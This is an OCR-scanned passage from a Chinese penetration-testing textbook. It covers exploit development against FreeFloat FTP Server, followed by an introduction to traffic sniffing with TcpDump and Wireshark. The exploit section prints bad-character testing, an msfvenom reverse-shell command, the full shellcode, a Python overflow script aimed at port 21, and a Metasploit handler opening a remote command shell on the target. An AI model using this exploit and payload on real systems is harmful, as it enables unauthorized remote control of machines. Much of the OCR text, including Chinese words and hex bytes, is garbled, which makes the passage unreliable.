"AXCONXC1NXC2NXC23NXCANXCBNAXCONXC7NXC8MXc9NXxcaNxcbNxccNAxcdNxceNxcfNxdoANxdi1N 
xd2Nxd3XxdANxd5Nxd6Nxd7Nxd8Nxd9NxdaNxdbNxdcNxddNxdeNxdft" 
"\xeð0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xfO\xf1\ 
xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 

Offset to eip= 230 

buffer = "A" * offset to eip 

buffer += "BBBB" 

buffer += badchars * 

S = Socket.socket(socket.AF INET,socket.SOCK STREAM) 

connect - s.connect(('192.168.1.106',21)) 

response = s.nrecv(1024) 

s.send('USER ' + buffer + '\r\n') 





iX ECEEHPAEHUPUS FERRIE BRI RH, BEITR 
会 引起 程序 的 终止 。 我 们 仍然 执行 这 上段 程序 ， 并 在 Immunity Debugger 
中 查看 引起 程序 终止 的 位 置 ， 如 图 11-28 所 示 。 





BBBEFC2S B63E1EA4 Kai. 
DBBBFCZE BOFS -... 
HABEFF3A  BRSEISBB |t: 


图 11-28 引起 程序 终止 的 位 置 


在 这 里 可 以 看 到 在 “BBBB” 后 和 面 的 第 一 行 的 后 面 ， 就 出现 
Į “Password required”， 这 说 明 在 “BBBB” 后 面 的 第 一 行 里 出 现 了 导致 目 
标 软 件 认为 用 户 名 已 经 输入 结束 的 字 从 了。 回头 我 们 来 看 一 下 这 一 行 一 
共 是 4 个 字符 “x00\x01\x02\x03”， 我 们 首先 将 这 里 面 的 ^x00” 去 挥 ， 如 末 
程序 丈 会 继续 同 下 执行 的 话 ， 那 么 说 明 这 个 字符 是 坏 字 符 ， 还 是 这 个 程 
序 ， 修 改 之 后 如 下 所 示 。 


| 


"NAX0O1NX02NX03Nx04NX0O5NX0O6NX07NX08Nx09Mx0aNxobNxocNxodNxoeNxo fNX10NX11NXx12N 
X13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 

DEAT ANET, fUB PAR. BI ETET E A BL An 
图 11-29 所 示 。 


TEFEN] 
4141 AAAF 
141 AAAF 


F25 IS RESI EE $+- p 
anapsEB9 .... 

aap3FCcaSd8  BasplsnBa .T:. ASCII 41,"HHH 
HAESFCS4 He 


图 11-29 ”第 二 次 引起 程序 终止 的 位 置 


好 了 了， 显然 现在 前 面 的 8 个 字符 没有 问题 了 ， 在 第 三 行 用 户 名 的 输 
入 再 次 被 终止 了 ， 那 么 这 说 明 现 在 
的 x01\x02\x03\x04\x05Wx06\x07\x08Wx09” 已 经 没有 问题 了， 出 问题 的 一 
定 是 ^\x0a\x0bx0cx0d” 中 的 一 个 。 我 们 再 将 这 4 个 字符 一 个 一 个 地 去 掉 
看 一 下 ， 站 完 去 挥 ^x0a”， 然 后 执行 这 个 程序 ,使 用 Immunity Debugger 
查看 里 面 的 变化 。 第 三 次 引起 程序 终止 的 位 置 如 图 11-30 所 示 。 








HAESFCA4 C41d4141id41 AAAA 
BaESFEBS 4ididi4i AAAP 
BapsrFcac 41414141 AAGA 
BapaFCcia8 


A L:s. ASCII 55,"SER 
| žie RETURN to kernel32.7C8 


to ntdll.7C9181H 
TURM to ntdll.rC968D2r 
.r1HBH 


ta mewuzack 


gsgal2siF Y G. 
|| BBBSFC34 à?|. 
BABESFCrFC  mapanala bk... 





图 11-30 第 三 次 引起 程序 终止 的 位 置 


好 了 ， 其 实 我 们 很 芋 运 的 ， 这 里 面 的 坏 字 符 刚 好 是 “^x0a”， 所 以 我 
们 一 次 不 竹 试 出 来 了 。 如 果 坏 字符 是 x0d” 的 话 ， 我 们 要 和 袜 试 的 次 数 旺 
然 要 更 多 。 好 了 ， 剩 下 的 步骤 你 最 好 目 行 完成 ， 这 个 程序 中 的 趟 字符 
是 “x00”x0a”%\x40”， 那 么 我 们 在 编写 Shellcode 的 时 候 ， 束 需要 避免 这 


3 个 坏 字 符 。 


11.6 ”使 用 Metasploit 来 生成 Shellcode 


好 了 ， 现 在 我 们 已 经 编号 好 了 一 个 可 以 使 用 的 漏洞 渗透 模块 ， 那 么 
我 们 如 何 利用 Metasploit 和 这 个 编号 好 的 模块 协同 工作 呢 ? 首先 我 们 使 
用 msfvenom 命 令 来 创建 一 个 可 以 使 用 的 shellcode。 


msfvenom -p windows/shell reverse tcp LHOST-192.168.1.104 LPORT=443 -b '\x 





00N xða\x40' -f c 


生成 的 shellcode 代 码 如 下 所 示 。 


"\xba\x3d\x25\x0f\xda\xda\xd3\xd9\x74\x24\xf4\x5e\x29\xc9\xb1" 
"\X52\x31\x56\x12\x83\xc6\x04\x03\x6b\x2b\xed\x2f\x6f\xdb\x73" 
"\xcf\x8f\xlc\x14\x59\x6a\x2d\x14\x3d\xff\xle\xa4\x35\xad\x92" 
"\X4f\x1b\x45\x20\x3d\xb4\x6a\x81\x88\xe2\x45\x12\xað0\xd7\xc4" 
"\xX90\xbb\xð0b\x26\xa8\x73\x5e\x27\xed\x6e\x93\x75\xa6\xe5\x06" 
"\X69\xc3\xbO\x9a\x02\X9IfF\x55\xX9b\xf7\x68\x57\x8a\xa6\xe3\xðe" 
"\XOc\x49\x27\x3b\x05\x51\x24\x06\xdf\xea\x9e\xfc\xde\x3a\xef" 
"\Xxfd\x4d\x03\xdf\xOfF\x8f\x44\xd8\xef\xfa\xbc\x1a\x8d\xfc\x7b" 
"\X60\x49\x88\x9f\xc2\x1a\x2a\x7b\xf2\xcf\xad\x08\xf8\xa4\xba" 
"\X56\x1d\x3a\x6e\xed\x19\xb7\x91\x21\xa8\x83\xb5\xe5\xf0\x50" 
"\xd7\xbc\x5c\x36\xe8\xde\x3e\xe7\x4c\x95\xd3\xfc\xfc\xf4\xbb" 
"\X31\xcd\x06\x3c\x5e\x46\x75\x0e\xc1\xfc\x11\x22\x8a\xda\xe6" 
"\x45\xal\x9b\x78\xb8\x4a\xdc\x51\x7f\xle\x8c\xc9\x56\x1f\x47" 
"\x69\x56\xca\xc8\x59\xf8\xa5\xa8\x69\xb8\x15\x41\x43\x37\x49" 
"\X71\x6c\x9d\xe2\x18\x97\x76\xcd\x75\x96\xee\xa5\x87\x98\xef" 
"\x8e\x01\x7e\x85\xe0\x47\x29\x32\x98\xcd\xa1\xa3\x65\xd8\xcc" 
"\xe4\xee\xef\x31\xaa\x06\x85\x21\x5b\xe7\xdð0\x1b\xca\xf8\xce" 
"\X33\xX90\xX6b\x95\xc3\xdf\x97\x02\x94\x88\x66\x5b\x70\x25\xd0" 
"\Xf5\x66\xb4\x84\x3e\x22\x63\x75\xc0\xab\xe6\xc1\xe6\xbb\x3e" 
"\Xxc9\xa2\xef\xee\x9c\x7c\x59\x49\x77\xcf\x33\x03\x24\x99\xd3" 
"\xd2\x06\x1a\xa5\xda\x42\xec\x49\x6a\x3b\xa9\x76\x43\xab\x3d" 
"\XOFf\xb9\x4b\xc1\xda\x79\x7b\x88\x46\x2b\x14\x55\x13\x69\x79" 


"\x66\xce\xae\x84\xe5\xfa\x4e\x73\xf5\x8f\x4b\x3f\xb1\x7c\x26" 
"\X50\x54\x82\xX95\x51\x7d"; 


你 可 以 将 这 段 代 码 的 功能 理解 为 一 个 森马， 这 个 木马 一 旦 在 目标 上 
运行 ， 就 会 在 目标 主机 上 打开 一 个 端口 ， 然 后 被 我 们 所 控制 。 加 入 了 这 
段 shellcode 之 后 的 代码 如 下 所 示 。 


import socket 

buff = "NXx41"*230-" XXD7NX30NX9DNX7C" +” Ax90" *20 
shellcode="\xba\x3d\x25\x0f\xda\xda\xd3\xd9\x74\x24\xf4\x5e\x29\xc9\xb1" 
shellcode+="\x52\x31\x56\x12\x83\xc6\x04\x03\x6b\x2b\xed\x2f\x6f\xdb\x73" 
shellcode+="\xcf\x8f\x1c\x14\x59\x6a\x2d\x14\x3d\xff\x1e\xa4\x35\xad\x92" 
shellcode+="\x4f\x1b\x45\x20\x3d\xb4\x6a\x81\x88\xe2\x45\x12\xað0\xd7\xc4" 
shellcode+="\x90\xbb\xð0b\x26\xa8\x73\x5e\x27\xed\x6e\x93\x75\xa6\xe5\x06" 
shellcode+="\x69\xc3\xbð0\x9a\x02\xX9f\x55\x9b\xf7\x68\x57\x8a\xa6\xe3\xðe" 
shellcode+="\xð0c\x49\x27\x3b\x05\x51\x24\x06\xdf\xea\x9e\xfc\xde\x3a\xef" 
shellcode+="\xfd\x4d\x03\xdf\xOf\x8f\x44\xd8\xef\xfa\xbc\x1a\x8d\xfc\x7b" 
shellcode+="\x60\x49\x88\x9f\xc2\x1a\x2a\x7b\xf2\xcf\xad\x08\xf8\xa4\xba" 
shellcode+="\x56\x1d\x3a\x6e\xed\x19\xb7\x91\x21\xa8\x83\xb5\xe5\xf0\x50" 
shellcode+="\xd7\xbc\x5c\x36\xe8\xde\x3e\xe7\x4c\x95\xd3\xfc\xfc\xf4\xbb" 
shellcode+="\x31\xcd\x06\x3c\x5e\x46\x75\x0e\xc1\xfc\x11\x22\x8a\xda\xe6" 
shellcode+="\x45\xa1\x9b\x78\xb8\x4a\xdc\x51\x7f\x1e\x8c\xc9\x56\x1f\x47" 
shellcode+="\x09\x56\xca\xc8\x59\xf8\xa5\xa8\x09\xb8\x15\x41\x43\x37\x49" 
shellcode+="\x71\x6c\x9d\xe2\x18\x97\x76\xcd\x75\x96\xee\xa5\x87\x98\xef" 
shellcode+="\x8e\x01\x7e\x85\xeð0\x47\x29\x32\x98\xcd\xa1\xa3\x65\xd8\xcc" 
shellcode+="\xe4\xee\xef\x31\xaa\x06\x85\x21\x5b\xe7\xdð0\x1b\xca\xf8\xce" 
shellcode+="\x33\x90\x6b\x95\xc3\xdf\x97\x02\x94\x88\x66\x5b\x70\x25\xd0" 
shellcode+="\xf5\x66\xb4\x84\x3e\x22\x63\x75\xc0\xab\xe6\xc1\xe6\xbb\x3e" 
shellcode+="\xc9\xa2\xef\xee\x9c\x7c\x59\x49\x77\xcf\x33\x03\x24\x99\xd3" 
shellcode+="\xd2\x06\x1a\xa5\xda\x42\xec\x49\x6a\x3b\xa9\x76\x43\xab\x3d" 
shellcode+="\xð0f\xb9\x4b\xc1\xda\x79\x7b\x88\x46\x2b\x14\x55\x13\x69\x79" 
shellcode+="\x66\xce\xae\x84\xe5\xfa\x4e\x73\xf5\x8f\x4b\x3f\xb1\x7c\x26" 
shellcode+="\x50\x54\x82\x95\x51\x7d" 

buff+=shellcode 

target = "192.168.1.106" 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 

s.connect((target,21)) 

s.send("USER "+buff+"\r\n") 

s.close() 
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root@kali:~# msfconsole 


启动 了 Metasploit 之 后 ， 执 行 如 下 命令 。 


msf> use exploit/multi/handler 
msf exploit(handler) » set payload windows/shell reverse tcp 


msf exploit(handler) » set lhost 192.168.1.104 
msf exploit(handler) » set lport 443 
msf exploit(handler) » exploit 


执行 的 结果 如 图 11-31 所 示 。 


msf > use exploit/multi/handler 

msf exploit( ) > set payload windows/shell reverse tcp 
payload => windows/shell_reverse tcp 

msf exploit( )» set lhost 192.168.1.104 

lhost -» 192.168.1.104 

msf exploit( ) > Set Lport 443 

Lport => 443 

msf exploit( ) > exploit 





Started reverse TCP handler on 192.168.1.104:443 
Starting the payload handler... 





图 11-31 对 handler 进 行 设 置 


然后 执行 渗透 脚本 ， 换 行 乙 后 可 以 看 到 Metasploit 的 洛 户 闪 成 功 建 
立 远 程控 制 连接 ， 如 图 11-32 所 示 。 


Started reverse TCP handler on 192.168.1.104:443 

Starting the payload handler... 

Command shell session 1 opened (192.168.1.104:443 -> 192.168.1.106:1266) at 
2017-09-16 04:32:58 -0400 


Microsoft Windows XP [Version 5.1.2600] 
(C) Copyright 1985-2001 Microsoft Corp. 





C:\Documents and SettingsMAdministratorMDesktop?li 


图 11-32 ”成 功 建立 远程 控制 连接 
好 了 ， 现 在 就 可 以 使 用 我 们 编写 的 程序 来 远程 控制 目标 计算 机 了 ， 


11.7 小 结 


在 本 草 中 我 们 针对 一 个 特定 源 洞 进行 渗透 模块 开 友 ， 这 是 一 个 存在 
于 FreeFloat FTP Server 软 件 上 的 Juda 2s 58). BB ZJ1 i, 
XTA P d vh] EST 28 n] EA de re 341 1328 22: 0] 3 77 TRI] HE 


在 本 章 开 始 的 时 候 ， 我 们 移 介 绍 了 如 何 来 引起 一 个 程序 的 朋 泥 ， 利 
用 毅 误 的 信息 可 以 找 出 该 程序 的 偶 移 地 址 。 然 后 我 们 讲解 了 如 何 利 用 这 
个 地 址 来 编写 一 个 渗透 开 肥 模块 ， 这 里 面 涉及 到 了 如 何 奏 找 “JMP 
ESP” 指 令 ， 如 何 编写 渗透 程序 ， 如 何 找 到 引起 程序 终止 的 坏 字 符 等 等 知 
识 点 。 最 后 我 们 使 用 Metasploit 生 成 了 Shellcode， 并 将 这 个 Shellcode 加 入 
到 了 渗透 模块 。 在 最 后 使 用 编写 的 程序 对 目标 的 汤 洞 进行 了 测试 。 


在 下 一 革 中 ， 我 们 将 会 介绍 网 络 数据 的 唱 探 与 其 蚤 。 


第 12 章 
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无 论 什 么 样 的 漏 调 渗 透 程序 ， 在 网 络 中 都 是 以 数据 包 的 形式 传输 
的 ， 因 此 如 来 我 们 能 够 对 网 络 中 的 数据 包 进 行 分 析 的 十， 束 可 以 深入 地 
掌握 渗透 的 原理 。 力 外 很 多 网 络 攻 击 的 方法 也 痢 是 利用 友 壕 精心 构 千 的 
数据 包 来 完成 ， 例 如 弟 见 的 ARP 雁 纹 。 利 用 这 种 欺 驴 方式 ， 黑 客 束 可 以 
截获 受害 计算 机 与 外 部 通信 的 全 部 数据 ， 例 如 胺 害 者 登录 使 用 的 用 户 名 
与 密码 、 友 人 的 邮件 等 。 


在 Kali Linux 2 的 司 动 弄 面 中 ， 驳 清晰 地 展示 了 一 条 忠告 “The quieter 
you are the more you are able to hear”。 设 想 这 样 的 一 个 场景 ， 一 个 黑客 
束 衣 前 地 潜伏 在 你 的 里边 ， 他 手中 的 设备 将 每 一 个 沅 经 你 计算 机 的 网 络 
数据 都 复制 了 一 份 。 互 联网 中 的 大 部 分 数据 都 没有 采用 加 密 的 方式 传 
得 ， 这 也 束 意 味 看 ， 你 在 网 络 上 的 一 举 一 动 都 在 别人 的 监视 之 下 。 例 如 
使 用 HTTP 协 议 、FTP 协 议 或 者 Telnet 协 议 所 传输 的 数据 都 是 明文 传输 
的 ， 一 旦 数据 包 补 监听， 那么 里 面 的 信息 也 直接 会 泄露 。 而 这 一 切 并 不 
难以 做 到 ， 任 何 一 个 有 经 验 的 黑客 都 可 以 轻而易举 地 使 用 抓 包工 其 来 捕 
狭 这些 信息 ， 从 而 突破 网 络 ， 作 取 网 络 中 的 秘 黎 。 网 络 中 了 最 为 赣 名 的 一 
种 舱 骗 攻击 航 称 为 “中间 人 攻击 ”。 在 这 种 攻击 方式 中 ， 攻 击 者 会 同时 其 
骗 设 备 A 和 设备 B， 攻 击 者 会 设法 让 设备 A 误 认 为 攻击 者 的 计算 机 才 是 设 
备 B， 辣 时 还 会 设法 让 设备 B 误 认为 攻击 着 的 计算 机 是 设备 A。 从 而 将 A 
和 B 之 间 的 通信 全 部会 经 过 攻击 者 的 设备 。 


当然 ， 除 了 黑客 会 使 用 这 些 抓 包工 具 之 外 ， 网 络 安全 人 员 也 会 使 用 
这 些 抓 包工 具 ， 利 用 这 些 工 具 也 可 以 友 现 黑客 的 不 法 入 侵 行为 。 


这 一 革 中 ， 我 们 将 会 束 如 下 的 两 点 技术 进行 讨论 。 
e 网 络 数据 的 咒 探 :在 Kali Linux 2 中 提供 了 很 多 可 以 用 来 实现 网 络 数 


据 咒 探 的 工具 ， 其 实 这 些 工 具 都 是 基于 相同 的 原理 。 所 有 通过 你 网 
卡 的 网 络 数据 都 是 可 以 被 读 取 的 。 这 些 网 络 数据 按照 各 种 各 样 不 同 
的 协议 组 织 到 了 一 起 。 所 以 我 们 只 要 掌握 了 各 种 协议 的 格式 ， 束 可 
以 分 析出 这 些 数据 所 表示 的 意义 。 当 然 ， 目 前 互联 网 上 所 使 用 的 协 
议 数 目 众多 ， 而 且 还 在 不 断 的 增长 中 《也 许 将 来 有 一 天 ， 互 联网 中 
所 使 用 的 菜 种 协议 就 是 由 你 设计 的 ) ， 我 们 在 学 习 的 时 候 ， 只 需要 
掌握 这 些 协议 中 最 为 重要 的 部 分 即 可 。 

网 络 数据 的 欺骗 在 互联 网 创建 之 初 ， 提 供 的 服务 和 使 用 的 人 员 都 
很 少 ， 因 此 也 无 需 考 虑 安全 方面 的 问题 。 所 以 作为 互联 网 协议 基础 
的 几 个 重要 协议 都 没有 使 用 安全 措施 。 但 是 随 厦 互联 网 的 规模 越 来 
越 大 ， 使 用 者 也 越 来 越 多 ， 一 些 抱 有 其 他 想法 的 人 也 开始 使 用 互联 
网 了 。 他 们 开始 利用 互联 网 的 号 陷 算 改 网 络 数据 来 实现 自己 的 目 
的 ， 这 些 人 一 开始 可 能 只 是 出 于 恶作剧 或 者 炫 泡 的 日 的 ， 而 渐渐 发 
展 成 为 了 一 种 破坏 甚至 敛财 的 手段 。 比 如 说 ， 我 们 都 十 分 了 解 的 
ICMP 协 议 ， 也 就 是 当主 机 A 向 主机 B 故 送 一 个 ICMP 请 求 的 时 候 ， 
主机 B 会 向 主机 A 回复 一 个 ICMP 回 应 。 如 果 我 们 伪造 一 个 由 主机 A 
发 出 的 ICMP 请 求 ， 并 将 这 个 数据 包 发 送 给 很 多 主机 ， 那 么 这 些 主 
机 就 都 会 向 主机 A 发 回 一 个 ICMP 回 应 。 主 机 A 就 不 得 不 使 用 大 量 的 
资源 来 处 理 这 些 回 应 。 


如 果 你 想 要 彻 夺 了解 一 个 网 络 的 话 ， 那 么 最 好 的 办 法 就 是 对 网 络 中 
的 流量 进行 咒 探 。 在 本 前 中 我 们 将 会 介绍 几 个 抓 包 工具 ， 这 些 抓 包工 具 
可 以 用 来 鳃 取 网 络 中 明文 传输 的 密码 ， 监 视 网 络 中 的 数据 流 癌 ， 甚 至 可 
以 收集 远程 登录 所 使 用 的 NTLM 数 据 包 (这 个 数据 包 中 包含 了 登录 用 的 
用 户 名 和 使 用 hash 加 窗 的 密码 ) 。 


12.1 使 用 TopDump 分 析 网 络 数据 


TcpDump 是 一 球 资 深 网 络 工 作 人 员 必 备 的 工具 ， 这 个 工具 极为 强 
大 。 在 David J. Malan 主 讲 的 哈佛 大 学 公开 读 《计算 机 科学 csS50》 H, 
David J. Malan 就 在 上 课时 使 用 TcpDump 捕 获 了 教室 中 的 网 络 流 量 。 


和 Kali Linux 2F IA E 2S F— FE, TcpDumpzé — 3 7 HJ LTETE 
纯 命 令 行 上 的 工具 。 也 正 由 于 它 的 体积 小 ， 所 以 这 球 工 具 可 以 完美 地 运 
行 在 大 多 数 路 由 器 、 防 火 墙 以 及 Linux 系 统 中 。 不 过 现在 这 款 工 具 也 有 
了 可 以 运行 在 Windows 操 作 系 统 上 的 版 本 。TcpDump 可 以 即时 地 显示 捕 
获 到 的 数据 包 。 直 接 在 Kali Linux 2 打开 一 个 命令 行 输入 “tcpdump” 就 可 
以 局 动 这 个 工具 ， 如 图 12-1 所 示 。 


root@kali: ~ oo Q 
File Edit View Search Terminal Help 


tcpdump: verbose output suppressed, use -v or -vv for full protocol decode 
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 
22:27:40.046922 IP 106.8.242.139. 11264 BREST PER UDP; l 
22:27:40.047955 IP 192.168.1.100.33272 » 106.8.242.139.11264: UDP, 
22:27:40.047959 IP 123.183.59.55.11969 > 192.168.1.190.33272: UDP, 
22:27:40.049403 IP 192.168.1.100.33272 » 123.183.59.55.11969: UDP, 


lengt 
ength 33 
22:27:40.052033 IP 123.180.240.157.15904 » 192.168.1.100.33272: UDP, length 33 
22:27:45.509169 IP kali.55400 > SJZ-CA7-ZONEl.domain: 31575« PTR? 55.59.183.123.in-addr 
.arpa. (44) 





图 12-1 局 动 的 TcpDump 


下 面 来 泗 示 一 下 这 个 工具 的 使 用 方法 。 首 先 我 们 使 用 TcpDump 来 捕 
获 网 络 中 的 数据 ， 但 是 并 不 对 这 些 数据 进行 存储 ， 执 行 的 命令 如 下 : 


tcpdump -v -i etho 


这 里 的 -i 用 来 指定 TcpDump 进 行 监听 所 使 用 的 网 卡 。-v 表 示 的 是 以 
verbose mode 显 示 。 妆 我 们 按 回 车 键 之 后 ，TcpDump 束 会 开始 工作 ， 所 
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下 CTRL+C 组 合 键 。 


在 这 种 情况 下 ， 数 据 显 示 的 速度 相当 之 快 ， 如 霖 十 在 一 个 大 型 网 络 
中 ， 我 们 根本 无 法 看 清楚 屏 闪 上 显示 的 内 容 。 这 时 我 们 可 以 选择 将 这 些 
捕获 到 的 数据 保存 在 一 个 文件 中 。 


root@kali:~# tcpdump -v -i eth6 -w cap-20171025.pcap 


我 们 现在 运行 上 面 的 命令 ， 将 捕获 到 的 数据 保存 在 名 为 cap- 
mcm 这 个 文件 的 后 级 名 为 pcap。 图 12-2 给 出 了 具体 的 实 
现 过 程 。 


root@kali: ~ 0o09 
File Edit View Search Terminal Help 


:~# Big -Vv -i eth0 -w cap-20171025.pcap 
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 byt 
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图 12-2 ”使 用 tcpdump 捕 获 数据 包 并 保存 


注意 从 现在 开始 ， 你 将 无 法 在 屏幕 上 看 到 捕 获 到 的 数据 包 ， 这 些 数 
据 将 会 保存 在 文件 中 。 这 里 面 的 参数 -w 表 明 要 将 捕获 到 的 数据 包 以 cap- 
2017025 为 名 保存 起 来 。 这 个 文件 最 好 起 一 个 可 以 说 明 其 含义 的 名 称 ， 
做 到 见 名 知 意 ， 后 面 再 跟 上 捕获 数据 的 日 期 。 但 是 要 注意 的 是 如 果 你 一 
天 时 间 内 使 用 同一 台 计 算 机 多 次 捕获 数据 包 的 话 ， 最 好 在 后 面 添 加 上 一 
个 可 以 区 分 的 标识 。 


12.2 ”使 用 Wireshark 进 行 网 络 分 析 


Wireshark 是 现在 世界 上 最 优秀 的 网 络 抓 包 软件 ， 同 时 也 是 目前 世界 
上 最 为 流行 的 网 络 分 析 软 件 。 和 TcpDump 一 样 ， 这 个 强大 的 工具 可 以 捕 
捉 网 络 中 的 数据 。 在 1997 年 的 时 候 Gerald Combs 开 始 了 Wireshark 前 号 
Ethereal 的 编写 工作 ， 之 后 有 很 多 人 都 参与 到 了 这 个 软件 的 编写 工作 中 
来 。2006 年 6 月 ， 因 为 商标 的 问题 ，Ethereal 更 名 为 Wireshark。 


相 比 起 TcpDump，Wireshark 最 大 优势 在 于 筑 心 悦目 的 GUI 界面 ， 目 
前 国内 外 的 大 部 分 网 络 方面 的 专家 都 将 Wireshark 视 作 必 备 的 工具 。 相 比 
起 其 他 的 网 络 抓 包 工具 ，Wireshark 上 具备 如 下 优势 。 


e 支持 协议 的 数量 众多 ，Wireshark 在 这 一 点 上 是 极为 优秀 的 ， 目 前 它 
己 经 支持 了 上 二 种 的 网 络 协议 。 这 些 协 议 包 括 从 最 基础 的 TCP 一 直 
到 现在 的 Bitcoin 协 议 等 。 

e 赏心悦目 的 GUI 操作 界面 ，Wireshark 提 供 了 清晰 的 菜单 栏 和 简明 的 
fips BERAI TENE, JEA z URAR AE I T a 
— {HE o 

e 开源 性 ， 不 管 你 是 否 为 一 个 财力 雄厚 的 大 企业 工作 ， 你 都 可 以 选择 
使 用 Wireshark。 因 为 Wireshark 是 完全 免费 上 的， 我们 无 需 付 出 任何 
费用 就 可 以 使 用 这 个 强大 无 比 工 具 的 全 部 功能 。 

e 应 用 的 广阔 性 ， 目 前 所 有 的 主流 操作 系统 都 文 持 Wireshark。 


在 Kali Linux 2 中 已经 安装 好 了 Wireshark。 局 动 Wireshark 的 方法 有 
两 种 ， 一 种 是 局 动 一 个 终 病 ， 然 后 在 终 瘦 中 输入 : 


root@kali:~# wireshark 


另外 也 可 以 在 菜单 中 局 动 Wireshark， 这 个 工具 位 于 分 类 中 的 “09- 


Sniffing&Spoofing”， 如 图 12-3 上 所 示 。 
启动 之 后 的 Wireshark 界 面 如 图 12-4 所 示 。 


Wireshark 的 工作 界面 和 普通 的 软件 没有 什么 区 列 ， 最 上 方 的 是 这 上 
栏 ， 然 后 是 工具 栏 。 一 般 一 个 主机 上 面 会 有 多 所 网 卡 ， 这 些 网 卡 作为 网 
络 数 据 流量 的 出 入 口 ， 我 们 可 以 指定 其 中 的 一 块 网 卡 ， 屏 蔽 挥 从 其 他 网 
卡 的 进出 流量 。 我 们 既 可 以 在 图 12-4 显 示 的 启动 界面 选择 网 卡 ， 也 可 以 
通过 沫 单 栏 进行 设置 。 首 先 单 击 来 单 栏 上 的 “Capture”， 在 Capture 下 拉 
列表 中 选择 Options， 如 图 12-5 所 示 。 


Favorites mm bdfproxy 
tòa 


01 - Information Gathering 
2. driftnet 
02 - Vulnerability Analysis ain 


03 - Web Application Analysis = ettercap-g... 
04 - Database Assessment 

ferret 
05 - Password Attacks 
06 - Wireless Attacks : NEDALA 
07 - Reverse Engineering macchanger 
08 - Exploitation Tools 

mitmproxy 
09 - Sniffing & Spoofing 


10 - Post Exploitation y netsniff-ng 


11 - Forensics responder 


12 - Reporting Tools 
wireshark 
13 - Social Engineering Tools 


14 - System Services 





Usual applications 


|12-3 ”在 applications 中 局 动 Wireshark 


The Wireshark Network Analyzer oo o0 
File Edit View Go Capture Analyze Statistics Telephony Wireless Tools Help 















































Am.iGnsooxooeo4*.2-€-—-mEm5 &aa:tr 
Apply a display filter … «Ctrl-/» c3 -| Expression... + 
Capture 
... using this filter: IR [Enter a capture filter -| 
eth0 AAA 4 
any AM 
Loopback: lo 
nflog 
nfqueue = 
Learn 
User's Guide - Wiki - Questions and Answers : Mailing Lists| 
You are running Wireshark 2.2.5 (Git Rev Unknown from unknown). 
^ Ready to load or capture No Packets Profile: Default 
图 12-4 ”Wireshark 的 局 动 寞 面 
The Wireshark Network Analyzer o o o 
File Edit View Go (yd Analyze Statistics Telephony Wireless Tools Help 
Am "=Heaag 
A Start Ctrl+E 
[A [Apply a display filter " -| Expression. + 
Capture Filters... 
Refresh Interfaces 
Capture 
... using this filter: |n | Enter a capture filter . v| 





多 12-5 ”在 Capture 下 拉 列 表 中 选择 Options 


接 下 来 会 弹出 一 个 “Capture Interfaces” 选 择 窗口 ， 在 这 个 窗口 中 我 
们 选择 需要 使 用 的 网 卡 ， 例 如 这 里 选择 最 沿用 的 eth0， 如 图 12-6 所 示 。 


Wireshark - Capture Interfaces [X] 





Input | Output | Options 





dl Iy X delid 

> Loopback: lo = Ethernet v default 2 
nflog — Linux netfilter log messages v default 2 
nfqueue e Raw IPv4 v default 2 
usbmon1 = DLT -1 v default 2 
usbmon2 eg DLT -1 v default 2 
Cisco remote capture: cisco SE Remote capture dependent DLT 


Random packet generator: randpkt — 
SSH remote capture: ssh 


4 


v| Enable promiscuous mode on all interfaces 


Generator dependent DLT 
Remote capture dependent DLT 


b 


Manage Interfaces... 





Capture filter for selected interfaces: IR | Enter a capture filter . 


-| Compile BPFs 





Help 


ose 


图 12-6 ”网卡 选择 控制 界面 


虽然 Wireshark 的 操作 界面 看 起 来 亚 复 杂 的 ， 但 其 实 使 用 起 来 和 
Tcpdump 一 样 简单 ， 仅 仅 是 指定 了 网 卡 之 后 束 可 以 开始 工作 了 ， 开 始 工 
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Capturing from ethO oo o0 
File Edit View Go Capture Analyze Statistics Telephony Wireless Tools Help 
EH (5S9 D X OQ e» g ie 9» F -—|& a rft 
IR Apply a display filter Ctrl-/» ca -~ -| Expression... 
N Time, S ed Protocol Len zu ius ^ 
om ololololololololo) 49,75.73.154 92.168.1. UDP 56 
2 0. 000000846 49.75.73.154 192 TBB8 Tol UDP 60 2406 
3 0.007465814 192,168;1.101 9,75.73.154 UDP 1314 4466 
4 0.007466719 192.168. Y 75 49.75.73.154 1 UDP 1314 4466 
5 0.007467242 . 192.168.1.101 49.75.73.154 UDP 1314 4466 
6 0.007467899 106.118. 224. 149 192.168.1.101 UDP 311 i 
Frame 1: 60 bytes o (480 bits), 60 bytes captur red mm TR nterfac 
> Ethernet II, Src: Tp- Ui "KL ies = ar a : fe:18:58:8c: 3b), C. 62:4e .29 m 
> Internet Protocol ah Sr Bub 3: T Ds ze 192. 168. abc 101. 
> User Datagram Protocol, 2 “Po RES ies Dst Po 4466 
» Data (16 Bites ) 


2 


4c cc 6a 62 4e 29 dc fe 18 58 8c 3b 08 00 45 00 Ls oU oon EN 
a8 


00 2c 2d ae 


00 O0 77 11 d9 20 31 4b 49 9a cO " B NADA 闷 


01 65 11 72 11 72 00 18 4f fa tis 55 00 01 04 00 JB oun 2 BK os 
00 


00 07 O0 OO OO 04 OO OO 00 8c 


© 7  ethO: «live capture in progress» 


Packets: 6972 - Displayed: 6972 (100.0%) Profile: Default 


图 12-7 ”Wireshark 的 工作 界面 


局 动 之 后 的 Wireshark 可 以 4 分 用 3 个 面 孤 部 `: 
数据 包 详 细 信 息 ，3 是 数据 包 原 始 信息 。 这 3 个 面板 相互 关联 ， 


1 是 数据 包 列 表 ， 
当 在 数据 


包 列 表 中 选中 一 个 数据 包 之 后， 在 数据 包 信息 面板 处 整 可 以 合 看 这 个 数 
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一 般 而 吾 ， 数 据 包 诗 细 信息 中 包 
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舍 的 内容 是 我 们 最 为 天 心 的 。 一 


这 些 协 议 一 层 层 地 将 要 传输 的 数据 包 


装 起 来 ， 例 如 网 12-8 中 展示 了 DHCPv6 的 数据 包 。 





4 
> Frame 4: 150 bytes on wire (1200 bits), 150 bytes a d puis bits) on interface 0 
(0) 


> Ethernet II, Sre: vmw 


are c0:00:08 (00:50:56:c0:00:0 


v6mcast 91: da 02 HEKISKE, 


